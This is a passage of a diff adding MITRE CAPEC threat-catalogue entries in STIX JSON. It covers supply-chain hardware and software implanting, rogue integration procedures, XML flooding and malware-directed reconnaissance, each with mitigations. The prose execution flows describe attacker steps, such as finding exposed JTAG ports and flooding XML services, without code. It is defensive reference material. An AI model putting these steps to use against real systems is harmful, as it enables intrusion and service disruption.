", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Physical access to the system after it has left the manufacturer but before it is deployed at the victim location." + ], + "x_capec_skills_required": { + "High": "Hardware creation and manufacture of replacement components." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that all contractors and sub-suppliers use trusted means of shipping (e.g., bonded/cleared/vetted and insured couriers) to ensure that components, once purchased, are not subject to compromise during their delivery.", + "id": "course-of-action--5d0d9e49-3036-4e81-987d-f0938def44da", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-522-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3e5d22fb-9a7a-4510-9013-518caaabf8fb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5d0d9e49-3036-4e81-987d-f0938def44da", + "target_ref": "attack-pattern--556f08be-d926-448c-b2c2-88a817a170a4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Prevent or detect tampering with critical hardware or firmware components while in transit through use of state-of-the-art anti-tamper devices.", + "id": "course-of-action--4b24a939-98c5-4cb3-993b-8237bb1e6b31", + "modified": "2022-09-29T00:00:00.000Z", + "name": 
"coa-522-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--13c57eb4-2ac4-4e73-9f83-5f22cf4194c9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4b24a939-98c5-4cb3-993b-8237bb1e6b31", + "target_ref": "attack-pattern--556f08be-d926-448c-b2c2-88a817a170a4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use tamper-resistant and tamper-evident packaging when shipping critical components (e.g., plastic coating for circuit boards, tamper tape, paint, sensors, and/or seals for cases and containers) and inspect received system components for evidence of tampering.", + "id": "course-of-action--1f214abb-be0a-4348-b681-5c21cc8c76ac", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-522-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b9712253-4163-4fb1-aca0-1392d19779d3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1f214abb-be0a-4348-b681-5c21cc8c76ac", + "target_ref": "attack-pattern--556f08be-d926-448c-b2c2-88a817a170a4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", 
+ "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker implants malicious software into the system in the supply chain distribution channel, with purpose of causing malicious disruption or allowing for additional compromise when the system is deployed.", + "external_references": [ + { + "external_id": "CAPEC-523", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/523.html" + }, + { + "description": "Supply Chain Compromise: Compromise Software Supply Chain", + "external_id": "T1195.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/002" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Daniel Simpson, Dani Halfin, Andrews Mariano Gorzelany, Beth Woodbury, Supply chain attacks, 2021--10---28, Microsoft", + "external_id": "REF-716", + "source_name": "reference_from_CAPEC", + "url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/supply-chain-malware" + } + ], + "id": "attack-pattern--02570621-96aa-4525-b782-8e3939affac3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Malicious Software Implanted", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--59ba3504-6764-48b4-980a-40e4adff2030" + ], + "x_capec_domains": [ + "Supply Chain" + ], + "x_capec_example_instances": [ + "An attacker has created a piece of malicious software designed to function as a backdoor in a system that is to be deployed at the victim location. 
During shipment of the system, the attacker has physical access to the system at a loading dock of an integrator for a short time. The attacker unpacks and powers up the system and installs the malicious piece of software, and configures it to run upon system boot. The system is repackaged and returned to its place on the loading dock, and is shipped and installed at the victim location with the malicious software in place, allowing the attacker to bypass firewalls and remotely gain access to the victim's network for further malicious activities." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine Entry Point: The adversary must first identify a system that they wish to target and search for an entry point they can use to install the malicious software. This could be a system which they have prior knowledge of, giving them insight into the software and environment.

  2. Techniques
    Use a JTAGulator to identify exposed JTAG and UART interfaces in smaller embedded systems.
    Identify exposed USB connectors that could be used to load software.
  3. Discover Vulnerability in Supply Chain: The adversary maps out the supply chain for the targeted system. They look for ooportunities to gain physical access to the system after it has left the manufacturer, but before it is deployed to the victim.

  4. Techniques
    Procure a system and observe the steps it takes in the shipment process.
    Identify possible warehouses that systems are stored after manufacturing.

Experiment

  1. Test Malicious Software: Before performing the attack in the wild, an adversary will test the attack on a system they have procured to ensure that the desired outcome will be achieved.

  2. Techniques
    Design malicious software that will give an adversary a backdoor into the system once it is deployed to the victim.
    Obtain already designed malicious software that just need to be placed into the system.

Exploit

  1. Implant Software in the Supply Chain: Using the vulnerability in the supply chain of the system discovered in the explore phase, the adversary implants the malicious software into the system. This results in the adversary gaining unintended access to systems once they reach the victim and can lead to a variety of follow up attacks.

", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Physical access to the system after it has left the manufacturer but before it is deployed at the victim location." + ], + "x_capec_skills_required": { + "High": "Malicious software creation." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Deploy strong code integrity policies to allow only authorized apps to run.", + "id": "course-of-action--44f41ebc-0a61-4b11-89cc-ee39adc7c9df", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-523-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e93662a7-a5b1-4a04-8484-d1b6f45fed3f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--44f41ebc-0a61-4b11-89cc-ee39adc7c9df", + "target_ref": "attack-pattern--02570621-96aa-4525-b782-8e3939affac3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use endpoint detection and response solutions that can automaticalkly detect and remediate suspicious activities.", + "id": "course-of-action--4a4c56d3-bd9f-4a93-a13c-48bf19a739bd", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-523-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": 
"2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a9e07347-a756-464a-9d08-127f1ed81bf7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4a4c56d3-bd9f-4a93-a13c-48bf19a739bd", + "target_ref": "attack-pattern--02570621-96aa-4525-b782-8e3939affac3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Maintain a highly secure build and update infrastructure by immediately applying security patches for OS and software, implementing mandatory integrity controls to ensure only trusted tools run, and requiring multi-factor authentication for admins.", + "id": "course-of-action--be1960df-7044-4eff-a0c2-b2bc18a0b4c2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-523-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--17e26e5a-6708-4c5c-b559-87469e885b6f", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--be1960df-7044-4eff-a0c2-b2bc18a0b4c2", + "target_ref": "attack-pattern--02570621-96aa-4525-b782-8e3939affac3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Require SSL for update channels and implement certificate transparency based verification.", + "id": 
"course-of-action--f7bcda54-37c4-4cb2-867e-a93b16bf0b1c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-523-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--90739ef7-b15d-4d24-bc46-6b8a4a460db0", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f7bcda54-37c4-4cb2-867e-a93b16bf0b1c", + "target_ref": "attack-pattern--02570621-96aa-4525-b782-8e3939affac3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Sign everything, including configuration files, XML files and packages.", + "id": "course-of-action--ed6f6199-c0e4-457b-bf01-c1c387be69cd", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-523-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5c3b0185-14be-491f-9447-065542f68070", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ed6f6199-c0e4-457b-bf01-c1c387be69cd", + "target_ref": "attack-pattern--02570621-96aa-4525-b782-8e3939affac3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + 
"description": "Develop an incident response process, disclose supply chain incidents and notify customers with accurate and timely information.", + "id": "course-of-action--92b13ced-765d-4949-8947-7d5e45c19556", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-523-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--eae3bd0d-e12e-4ed2-800c-3ebd304dd814", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--92b13ced-765d-4949-8947-7d5e45c19556", + "target_ref": "attack-pattern--02570621-96aa-4525-b782-8e3939affac3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker alters or establishes rogue processes in an integration facility in order to insert maliciously altered components into the system. The attacker would then supply the malicious components. This would allow for malicious disruption or additional compromise when the system is deployed.", + "external_references": [ + { + "external_id": "CAPEC-524", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/524.html" + }, + { + "description": "John F. 
Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Daniel Simpson, Dani Halfin, Andrews Mariano Gorzelany, Beth Woodbury, Supply chain attacks, 2021--10---28, Microsoft", + "external_id": "REF-716", + "source_name": "reference_from_CAPEC", + "url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/supply-chain-malware" + } + ], + "id": "attack-pattern--f17dd173-6fcf-4f43-8f72-0f274dde5fc5", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Rogue Integration Procedures", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--59ba3504-6764-48b4-980a-40e4adff2030" + ], + "x_capec_domains": [ + "Supply Chain" + ], + "x_capec_example_instances": [ + "An attacker gains access to a system integrator's documentation for the preparation of purchased systems designated for deployment at the victim's location. As a part of the preparation, the included 100 megabit network card is to be replaced with a 1 gigabit network card. The documentation is altered to reflect the type of 1 gigabit network card to use, and the attacker ensures that this type of network card is provided by the attacker's own supply. The card has additional malicious functionality which will allow for additional compromise by the attacker at the victim location once the system is deployed." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Physical access to an integration facility that prepares the system before it is deployed at the victim location." + ], + "x_capec_skills_required": { + "High": "Hardware creation and manufacture of replacement components." 
+ }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--444a2e75-60cc-457e-bba7-af35561ff6bb", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--44f41ebc-0a61-4b11-89cc-ee39adc7c9df", + "target_ref": "attack-pattern--f17dd173-6fcf-4f43-8f72-0f274dde5fc5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fa96d7c5-a195-4776-8593-4c3da18a0788", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4a4c56d3-bd9f-4a93-a13c-48bf19a739bd", + "target_ref": "attack-pattern--f17dd173-6fcf-4f43-8f72-0f274dde5fc5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3e2b7ea2-a95c-44d2-88af-b8f040f18920", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--be1960df-7044-4eff-a0c2-b2bc18a0b4c2", + "target_ref": "attack-pattern--f17dd173-6fcf-4f43-8f72-0f274dde5fc5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c109c7e5-daa6-42f0-81a6-5416db0cc058", + "modified": "2022-02-22T00:00:00.000Z", + 
"object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f7bcda54-37c4-4cb2-867e-a93b16bf0b1c", + "target_ref": "attack-pattern--f17dd173-6fcf-4f43-8f72-0f274dde5fc5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--219a5740-2430-4bff-9bab-743bd8be41d4", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ed6f6199-c0e4-457b-bf01-c1c387be69cd", + "target_ref": "attack-pattern--f17dd173-6fcf-4f43-8f72-0f274dde5fc5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--47413465-eeac-49db-9632-f885ebc15e1a", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--92b13ced-765d-4949-8947-7d5e45c19556", + "target_ref": "attack-pattern--f17dd173-6fcf-4f43-8f72-0f274dde5fc5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Maintain strong physical system access controls and monitor networks and physical facilities for insider threats.", + "id": "course-of-action--da4c5f85-68af-498c-a2cb-7dc95e9c7115", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-524-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": 
"2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5318f2ea-5803-44c4-883f-e69b2e824665", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--da4c5f85-68af-498c-a2cb-7dc95e9c7115", + "target_ref": "attack-pattern--f17dd173-6fcf-4f43-8f72-0f274dde5fc5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary may execute a flooding attack using XML messages with the intent to deny legitimate users access to a web service. These attacks are accomplished by sending a large number of XML based requests and letting the service attempt to parse each one. In many cases this type of an attack will result in a XML Denial of Service (XDoS) due to an application becoming unstable, freezing, or crashing.", + "external_references": [ + { + "external_id": "CAPEC-528", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/528.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "description": "Endpoint Denial of Service:Service Exhaustion Flood", + "external_id": "T1499.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1499/002" + }, + { + "description": "Network Denial of Service:Direct Network Flood", + "external_id": "T1498.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1498/001" + } + ], + "id": "attack-pattern--ad3913be-6ca6-48e6-9e3b-7b67e4162612", + "modified": "2022-02-22T00:00:00.000Z", + "name": "XML Flood", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + 
"x_capec_abstraction": "Standard", + "x_capec_alternate_terms": [ + "XML Denial of Service (XML DoS)" + ], + "x_capec_child_of_refs": [ + "attack-pattern--6854fe89-0829-429f-a95c-89e77ab6c8ed" + ], + "x_capec_consequences": { + "Availability": [ + "Resource Consumption" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Consider the case of attack performed against the createCustomerBillingAccount Web Service for an online store. In this case, the createCustomerBillingAccount Web Service receives a huge number of simultaneous requests, containing nonsense billing account creation information (the small XML messages). The createCustomerBillingAccount Web Services may forward the messages to other Web Services for processing. The application suffers from a high load of requests, potentially leading to a complete loss of availability the involved Web Service." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the target: Using a browser or an automated tool, an attacker records all instance of web services to process XML requests.

  2. Techniques
    Use an automated tool to record all instances of URLs to process XML requests.
    Use a browser to manually explore the website and analyze how the application processes XML requests.

Experiment

  1. An adversary crafts input data that may have an adverse effect on the operation of the web service when the XML data sent to the service.

Exploit

  1. Launch a resource depletion attack: The attacker delivers a large number of XML messages to the target URLs found in the explore phase at a sufficiently rapid rate. It causes denial of service to the target application.

  2. Techniques
    Send a large number of crafted XML messages to the target URL.
", + "x_capec_extended_description": "\n XDoS is most closely associated with web services, SOAP, and Rest, because remote service requesters can post malicious XML payloads to the service provider designed to exhaust the service provider's memory, CPU, and/or disk space. The main weakness in XDoS is that the service provider generally must inspect, parse, and validate the XML messages to determine routing, workflow, security considerations, and so on. It is exactly these inspection, parsing, and validation routines that XDoS targets. This attack exploits the loosely coupled nature of web services, where the service provider has little to no control over the service requester and any messages the service requester sends.\n ", + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--94238840-08ad-4117-8a20-ed359cda1e7e" + ], + "x_capec_prerequisites": [ + "The target must receive and process XML transactions.", + "An adverssary must possess the ability to generate a large amount of XML based messages to send to the target service." 
+ ], + "x_capec_skills_required": { + "Low": "Denial of service" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--90c77905-bef0-451f-b726-1225d30da2de", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--098aadf6-648b-4c3a-bbf9-224e6bd430fd", + "target_ref": "attack-pattern--ad3913be-6ca6-48e6-9e3b-7b67e4162612", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--56794f75-72f9-4d9c-8fe4-a17e9e46b6c5", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ba0208fb-20e5-4c4f-9a93-d5d806d038e6", + "target_ref": "attack-pattern--ad3913be-6ca6-48e6-9e3b-7b67e4162612", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Adversary uses malware or a similarly controlled application installed inside an organizational perimeter to gather information about the composition, configuration, and security mechanisms of a targeted application, system or network.", + "external_references": [ + { + "external_id": "CAPEC-529", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/529.html" + } + ], + "id": "attack-pattern--6f7f4589-3abb-4aa8-ac80-1a6715d75a8b", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Malware-Directed Internal Reconnaissance", + "object_marking_refs": [ + 
"marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--c8c9dfbe-7a40-4041-84ff-89942878a2f4", + "attack-pattern--a55491b8-b521-44f4-a905-a6ed82b8e7e8" + ], + "x_capec_child_of_refs": [ + "attack-pattern--87b0d2df-b246-4bf9-aee8-4912e2fa1a30" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The adversary must have internal, logical access to the target network and system." + ], + "x_capec_resources_required": [ + "The adversary requires a variety of tools to collect information about the target. These include port/network scanners and tools to analyze responses from applications to determine version and configuration information. Footprinting a system adequately may also take a few days if the attacker wishes the footprinting attempt to go undetected." + ], + "x_capec_skills_required": { + "Medium": "The adversary must be able to obtain or develop, as well as place malicious software inside the target network/system." 
+ }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7dcaa766-8fbb-4cf2-9d26-1cb5b3739b11", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a7d31992-837d-4b43-91fb-5fd7cffc161b", + "target_ref": "attack-pattern--6f7f4589-3abb-4aa8-ac80-1a6715d75a8b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Identify programs that may be used to acquire peripheral information and block them by using a software restriction policy or tools that restrict program execution by using a process allowlist.", + "id": "course-of-action--a2404315-1d87-4e47-a8e4-c6b2cfe457d8", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-529-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a65abf1a-adf4-4c4d-9dbb-1ad3f3be601b", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a2404315-1d87-4e47-a8e4-c6b2cfe457d8", + "target_ref": "attack-pattern--6f7f4589-3abb-4aa8-ac80-1a6715d75a8b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "If a string is passed through a filter 
